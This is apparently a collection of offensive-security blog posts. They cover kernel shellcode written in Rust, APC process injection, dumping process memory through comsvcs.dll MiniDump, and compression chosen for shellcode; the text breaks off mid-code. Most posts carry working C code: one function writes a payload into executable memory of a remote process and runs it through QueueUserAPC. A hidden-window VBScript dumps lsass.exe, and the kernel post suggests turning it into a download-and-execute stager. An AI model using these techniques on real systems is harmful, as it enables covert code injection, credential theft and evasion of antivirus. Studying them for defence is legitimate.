    The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.

    Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.

    For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

    Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

    Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and all edge cases are not taken into account.

    Conclusion

    SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

    What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode Meterpreter like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

    Windows Process Injection: Asynchronous Procedure Call (APC)

    By: odzhan
    27 August 2019 at 18:00

    Introduction

    An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

    Alertable Threads

    A number of Windows API and the underlying system calls support asynchronous operations and specifically I/O completion routines.. A boolean parameter tells the kernel a calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 API can set threads to alertable.

    A few others rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations. e.g ReadFile.

    Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

    Method 1

    First described and used by Tal Liberman in a technique he invented called AtomBombing.

    …create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

    Based on this description, we take the following steps:

    1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
    2. CreateEvent for each thread and DuplicateHandle for the target process.
    3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
    4. WaitForMultipleObjects until one of the event handles becomes signalled.
    5. The first event signalled is from an alertable thread.

    MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

    HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
        DWORD         i, cnt = 0;
        HANDLE        evt[2], ss, ht, h = NULL, 
          hl[MAXIMUM_WAIT_OBJECTS],
          sh[MAXIMUM_WAIT_OBJECTS],
          th[MAXIMUM_WAIT_OBJECTS];
        THREADENTRY32 te;
        HMODULE       m;
        LPVOID        f, rm;
        
        // 1. Enumerate threads in target process
        ss = CreateToolhelp32Snapshot(
          TH32CS_SNAPTHREAD, 0);
          
        if(ss == INVALID_HANDLE_VALUE) return NULL;
    
        te.dwSize = sizeof(THREADENTRY32);
        
        if(Thread32First(ss, &te)) {
          do {
            // if not our target process, skip it
            if(te.th32OwnerProcessID != pid) continue;
            // if we can't open thread, skip it
            ht = OpenThread(
              THREAD_ALL_ACCESS, 
              FALSE, 
              te.th32ThreadID);
              
            if(ht == NULL) continue;
            // otherwise, add to list
            hl[cnt++] = ht;
            // if we've reached MAXIMUM_WAIT_OBJECTS. break
            if(cnt == MAXIMUM_WAIT_OBJECTS) break;
          } while(Thread32Next(ss, &te));
        }
    
        // Resolve address of SetEvent
        m  = GetModuleHandle(L"kernel32.dll");
        f  = GetProcAddress(m, "SetEvent");
        
        for(i=0; i<cnt; i++) {
          // 2. create event and duplicate in target process
          sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
          
          DuplicateHandle(
            GetCurrentProcess(),  // source process
            sh[i],                // source handle to duplicate
            hp,                   // target process
            &th[i],               // target handle
            0, 
            FALSE, 
            DUPLICATE_SAME_ACCESS);
            
          // 3. Queue APC for thread passing target event handle
          QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
        }
    
        // 4. Wait for event to become signalled
        i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
        if(i != WAIT_TIMEOUT) {
          // 5. save thread handle
          h = hl[i];
        }
        
        // 6. Close source + target handles
        for(i=0; i<cnt; i++) {
          CloseHandle(sh[i]);
          CloseHandle(th[i]);
          if(hl[i] != h) CloseHandle(hl[i]);
        }
        CloseHandle(ss);
        return h;
    }
    

    Method 2

    At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

    If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

    Figure 1. Disassembly of SleepEx on Windows 10.

    The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

    Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

    This address can be used to determine if a thread has called KERNELBASE!SleepEx. To calculate it, we have two options. Add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

    For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

    Figure 3. Win32 API and NT System Call Wrappers.

    The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

    Win32 API NT System Call
    SleepEx ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
    WaitForSingleObjectEx
    GetOverlappedResultEx
    ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    WaitForMultipleObjectsEx
    WSAWaitForMultipleEvents
    NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, DWORD Timeout, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    SignalObjectAndWait NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    MsgWaitForMultipleObjectsEx NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
    GetQueuedCompletionStatusEx NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

    The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

    Figure 4. Win64 Stack Layout.

    Based on the prototypes shown in the above table, to determine if a thread is alertable, verify the register holding the Alertable parameter is TRUE or FALSE. The following code performs this.

    BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
        CONTEXT   c;
        BOOL      alertable = FALSE;
        DWORD     i;
        ULONG_PTR p[8];
        SIZE_T    rd;
        
        // read the context
        c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
        GetThreadContext(ht, &c);
        
        // for each alertable function
        for(i=0; i<6 && !alertable; i++) {
          // compare address with program counter
          if((LPVOID)c.Rip == addr[i]) {
            switch(i) {
              // ZwDelayExecution
              case 0 : {
                alertable = (c.Rcx & TRUE);
                break;
              }
              // NtWaitForSingleObject
              case 1 : {
                alertable = (c.Rdx & TRUE);
                break;
              }
              // NtWaitForMultipleObjects
              case 2 : {
                alertable = (c.Rsi & TRUE);
                break;
              }
              // NtSignalAndWaitForSingleObject
              case 3 : {
                alertable = (c.Rsi & TRUE);
                break;
              }
              // NtUserMsgWaitForMultipleObjectsEx
              case 4 : {
                ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
                alertable = (p[5] & MWMO_ALERTABLE);
                break;
              }
              // NtRemoveIoCompletionEx
              case 5 : {
                ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd);
                alertable = (p[6] & TRUE);
                break;
              }            
            }
          }
        }
        return alertable;
    }
    

    You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

    Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

    Figure 6. Rsi used to for Alertable parameter to NtSignalAndWaitForSingleObject.

    The following code can support adding an offset or reading the thread context before enumerating threads.

    // thread to run alertable functions
    DWORD WINAPI ThreadProc(LPVOID lpParameter) {
        HANDLE           *evt = (HANDLE)lpParameter;
        HANDLE           port;
        OVERLAPPED_ENTRY lap;
        DWORD            n;
        
        SleepEx(INFINITE, TRUE);
        
        WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
        
        WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
        
        SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
        
        ResetEvent(evt[0]);
        ResetEvent(evt[1]);
        
        MsgWaitForMultipleObjectsEx(2, evt, 
          INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
          
        port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
        GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
        CloseHandle(port);
        
        return 0;
    }
    
    HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
        HANDLE        ss, ht, evt[2], h = NULL;
        LPVOID        rm, sevt, f[6];
        THREADENTRY32 te;
        SIZE_T        rd;
        DWORD         i;
        CONTEXT       c;
        ULONG_PTR     p;
        HMODULE       m;
        
        // using the offset requires less code but it may
        // not work across all systems.
    #ifdef USE_OFFSET
        char *api[6]={
          "ZwDelayExecution", 
          "ZwWaitForSingleObject",
          "NtWaitForMultipleObjects",
          "NtSignalAndWaitForSingleObject",
          "NtUserMsgWaitForMultipleObjectsEx",
          "NtRemoveIoCompletionEx"};
          
        // 1. Resolve address of alertable functions
        for(i=0; i<6; i++) {
          m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
          f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
        }
    #else
        // create thread to execute alertable functions
        evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
        evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
        ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
        
        // wait a moment for thread to initialize
        Sleep(100);
        
        // resolve address of SetEvent
        m      = GetModuleHandle(L"kernel32.dll");
        sevt   = GetProcAddress(m, "SetEvent");
        
        // for each alertable function
        for(i=0; i<6; i++) {
          // read the thread context
          c.ContextFlags = CONTEXT_CONTROL;
          GetThreadContext(ht, &c);
          // save address
          f[i] = (LPVOID)c.Rip;
          // queue SetEvent for next function
          QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
        }
        // cleanup thread
        CloseHandle(ht);
        CloseHandle(evt[0]);
        CloseHandle(evt[1]);
    #endif
    
        // Create a snapshot of threads
        ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        if(ss == INVALID_HANDLE_VALUE) return NULL;
        
        // check each thread
        te.dwSize = sizeof(THREADENTRY32);
        
        if(Thread32First(ss, &te)) {
          do {
            // if not our target process, skip it
            if(te.th32OwnerProcessID != pid) continue;
            
            // if we can't open thread, skip it
            ht = OpenThread(
              THREAD_ALL_ACCESS, 
              FALSE, 
              te.th32ThreadID);
              
            if(ht == NULL) continue;
            
            // found alertable thread?
            if(IsAlertable(hp, ht, f)) {
              // save handle and exit loop
              h = ht;
              break;
            }
            // else close it and continue
            CloseHandle(ht);
          } while(Thread32Next(ss, &te));
        }
        // close snap shot
        CloseHandle(ss);
        return h;
    }
    

    Conclusion

    Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

    Injection

    After the difficult part of detecting alertable threads, the rest is fairly straight forward. The two main functions used for APC injection are:

    The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

    NTSTATUS NtQueueApcThread(
      IN  HANDLE ThreadHandle,
      IN  PVOID ApcRoutine,
      IN  PVOID ApcRoutineContext OPTIONAL,
      IN  PVOID ApcStatusBlock OPTIONAL,
      IN  ULONG ApcReserved OPTIONAL);
    
    VOID KiUserApcDispatcher(
      IN  PCONTEXT Context,
      IN  PVOID ApcContext,
      IN  PVOID Argument1,
      IN  PVOID Argument2,
      IN  PKNORMAL_ROUTINE ApcRoutine)
    

    For this post, only QueueUserAPC is used.

    VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
        HANDLE hp, ht;
        SIZE_T wr;
        LPVOID cs;
        
        // 1. Open target process
        hp = OpenProcess(
          PROCESS_DUP_HANDLE | 
          PROCESS_VM_READ    | 
          PROCESS_VM_WRITE   | 
          PROCESS_VM_OPERATION, 
          FALSE, pid);
          
        if(hp == NULL) return;
        
        // 2. Find an alertable thread
        ht = find_alertable_thread1(hp, pid);
    
        if(ht != NULL) {
          // 3. Allocate memory
          cs = VirtualAllocEx(
            hp, 
            NULL, 
            payloadSize, 
            MEM_COMMIT | MEM_RESERVE, 
            PAGE_EXECUTE_READWRITE);
            
          if(cs != NULL) {
            // 4. Write code to memory
            if(WriteProcessMemory(
              hp, 
              cs, 
              payload, 
              payloadSize, 
              &wr)) 
            {
              // 5. Run code
              QueueUserAPC(cs, ht, 0);
            } else {
              printf("unable to write payload to process.\n");
            }
            // 6. Free memory
            VirtualFreeEx(
              hp, 
              cs, 
              0, 
              MEM_DECOMMIT | MEM_RELEASE);
          } else {
            printf("unable to allocate memory.\n");
          }
        } else {
          printf("unable to find alertable thread.\n");
        }
        // 7. Close process
        CloseHandle(hp);
    }
    

    PoC here

    alert_output

    odzhan

    MiniDumpWriteDump via COM+ Services DLL

    By: odzhan
    30 August 2019 at 10:42

    Introduction

    This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

    UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

    While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword “full” even though there’s no alternative for this last parameter.

    To use from the command line, type the following: "rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full"" where “1234” is the target process to dump. Obviously, this assumes you have permission to query and read the memory of target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

    BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

    #define UNICODE
    #include <windows.h>
    #include <stdio.h>
    
    typedef HRESULT (WINAPI *_MiniDumpW)(
      DWORD arg1, DWORD arg2, PWCHAR cmdline);
      
    typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
      ULONG Privilege, BOOL Enable, 
      BOOL CurrentThread, PULONG Enabled);
    
    // "<pid> <dump.bin> full"
    int wmain(int argc, wchar_t *argv[]) {
        HRESULT             hr;
        _MiniDumpW          MiniDumpW;
        _RtlAdjustPrivilege RtlAdjustPrivilege;
        ULONG               t;
        
        MiniDumpW          = (_MiniDumpW)GetProcAddress(
          LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
          
        RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
          GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
        
        if(MiniDumpW == NULL) {
          printf("Unable to resolve COMSVCS!MiniDumpW.\n");
          return 0;
        }
        // try enable debug privilege
        RtlAdjustPrivilege(20, TRUE, FALSE, &t);
            
        printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
       
        // dump process
        MiniDumpW(0, 0,  argv[1]);
        printf("OK!\n");
        
        return 0;
    }
    

    Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBscript will work in an elevated process.

    Option Explicit
    
    Const SW_HIDE = 0
    
    If (WScript.Arguments.Count <> 1) Then
        WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
        WScript.StdOut.WriteLine("Usage: procdump <process>")
        WScript.Quit
    Else
        Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
        
        ' get process id or name
        pid = WScript.Arguments(0)
        
        ' connect with debug privilege
        Set fso  = CreateObject("Scripting.FileSystemObject")
        Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
        
        ' if not a number
        If(Not IsNumeric(pid)) Then
          query = "Name"
        Else
          query = "ProcessId"
        End If
        
        ' try find it
        Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
          query & " = '" & pid & "'")
        
        If (list.Count = 0) Then
          WScript.StdOut.WriteLine("Can't find active process : " & pid)
          WScript.Quit()
        End If
    
        For Each proc in list
          pid = proc.ProcessId
          str = proc.Name
          Exit For
        Next
    
        dmp = fso.GetBaseName(str) & ".bin"
        
        ' if dump file already exists, try to remove it
        If(fso.FileExists(dmp)) Then
          WScript.StdOut.WriteLine("Removing " & dmp)
          fso.DeleteFile(dmp)
        End If
        
        WScript.StdOut.WriteLine("Attempting to dump memory from " & _
          str & ":" & pid & " to " & dmp)
        
        Set proc       = svc.Get("Win32_Process")
        Set startup    = svc.Get("Win32_ProcessStartup")
        Set cfg        = startup.SpawnInstance_
        cfg.ShowWindow = SW_HIDE
    
        cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
              pid & " " & fso.GetAbsolutePathName(".") & "\" & _
              dmp & " full"
        
        Call proc.Create (cmd, null, cfg, pid)
        
        ' sleep for a second
        Wscript.Sleep(1000)
        
        If(fso.FileExists(dmp)) Then
          WScript.StdOut.WriteLine("Memory saved to " & dmp)
        Else
          WScript.StdOut.WriteLine("Something went wrong.")
        End If
    End If
    

    Run from elevated cmd prompt.

    No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂

    coms

    odzhan

    Shellcode: Data Compression

    By: odzhan
    8 December 2019 at 15:00

    Introduction

    This post examines data compression algorithms suitable for position-independent codes and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

    For shellcode, algorithms based on the following conditions are considered:

    1. Compact decompressor.
    2. Good compression ratio.
    3. Portable across operating systems and architectures.
    4. Difficult to detect by signature.
    5. Unencumbered by patents and licensing.

    Meeting the requirements isn’t that easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

    Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

    Table of contents

    1. Executable Compression
    2. Windows NT Layer DLL
    3. Windows Compression API
    4. Windows Packaging API
    5. Windows Imaging API
    6. Direct3D HLSL Compiler
    7. Windows-internal libarchive library
    8. LibreSSL Cryptography Library
    9. Windows.Storage.Compression
    10. Windows Undocumented API
    11. Summary

    1. Executable Compression

    The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

    The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

    • Redemption, by Jacky Qwerty/29A
    • Inca, Hybris, by Vecna/29A
    • Aldebaran, by Bozo/iKX
    • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
    • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
    • Junkmail, Junkhtmail, by roy g biv/29A/defjam

    The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

    BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

    While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

    Figure 1: Shellcode constructor by Z0MBiE/29A

    UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

    Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

    2. Windows NT Layer DLL

    Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

    • Compression

    Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

    DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
        ULONG                            wspace, fspace;
        SIZE_T                           outlen;
        DWORD                            len;
        NTSTATUS                         nts;
        PVOID                            ws, outbuf;
        HMODULE                          m;
        RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
        RtlCompressBuffer_t              RtlCompressBuffer;
          
        m = GetModuleHandle("ntdll");
        RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
        RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
            
        if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
          printf("Unable to resolve RTL API\n");
          return 0;
        }
            
        // 1. obtain the size of workspace
        nts = RtlGetCompressionWorkSpaceSize(
          engine | COMPRESSION_ENGINE_MAXIMUM, 
          &wspace, &fspace);
              
        if(nts == 0) {
          // 2. allocate memory for workspace
          ws = malloc(wspace); 
          if(ws != NULL) {
            // 3. allocate memory for output 
            outbuf = malloc(inlen);
            if(outbuf != NULL) {
              // 4. compress data
              nts = RtlCompressBuffer(
                engine | COMPRESSION_ENGINE_MAXIMUM, 
                inbuf, inlen, outbuf, inlen, 0, 
                (PULONG)&outlen, ws); 
                  
              if(nts == 0) {
                // 5. write the original length
                WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
                // 6. write compressed data to file
                WriteFile(outfile, outbuf, outlen, &len, 0);
              }
              // 7. free output buffer
              free(outbuf);
            }
            // 8. free workspace
            free(ws);
          }
        }
        return outlen;
    }
    
    • Decompression

    LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer, however, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

        typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
          USHORT                 CompressionFormatAndEngine,
          PUCHAR                 UncompressedBuffer,
          ULONG                  UncompressedBufferSize,
          PUCHAR                 CompressedBuffer,
          ULONG                  CompressedBufferSize,
          PULONG                 FinalUncompressedSize,
          PVOID                  WorkSpace);
          
    DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        ULONG                            wspace, fspace;
        SIZE_T                           outlen = 0;
        DWORD                            len;
        NTSTATUS                         nts;
        PVOID                            ws, outbuf;
        HMODULE                          m;
        RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
        RtlDecompressBufferEx_t          RtlDecompressBufferEx;
          
        m = GetModuleHandle("ntdll");
        RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
        RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
            
        if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
          printf("Unable to resolve RTL API\n");
          return 0;
        }
            
        // 1. obtain the size of workspace
        nts = RtlGetCompressionWorkSpaceSize(
          engine | COMPRESSION_ENGINE_MAXIMUM, 
          &wspace, &fspace);
              
        if(nts == 0) {
          // 2. allocate memory for workspace
          ws = malloc(wspace); 
          if(ws != NULL) {
            // 3. allocate memory for output
            outlen = *(DWORD*)inbuf;
            outbuf = malloc(outlen);
            
            if(outbuf != NULL) {
              // 4. decompress data
              nts = RtlDecompressBufferEx(
                engine | COMPRESSION_ENGINE_MAXIMUM, 
                outbuf, outlen, 
                (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
                (PULONG)&outlen, ws); 
                  
              if(nts == 0) {
                // 5. write decompressed data to file
                WriteFile(outfile, outbuf, outlen, &len, 0);
              } else {
                printf("RtlDecompressBufferEx failed with %08lx\n", nts);
              }
              // 6. free output buffer
              free(outbuf);
            } else {
              printf("malloc() failed\n");
            }
            // 7. free workspace
            free(ws);
          }
        }
        return outlen;
    }
    

    3. Windows Compression API

    Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

    Compression

    DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        COMPRESSOR_HANDLE ch = NULL;
        BOOL              r;
        SIZE_T            outlen, len;
        LPVOID            outbuf;
        DWORD             wr;
        
        // Create a compressor
        r = CreateCompressor(engine, NULL, &ch);
        
        if(r) {    
          // Query compressed buffer size.
          Compress(ch, inbuf, inlen, NULL, 0, &len);      
          if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
            // allocate memory for compressed data
            outbuf = malloc(len);
            if(outbuf != NULL) {
              // Compress data and write data to outbuf.
              r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
              // if compressed ok, write to file
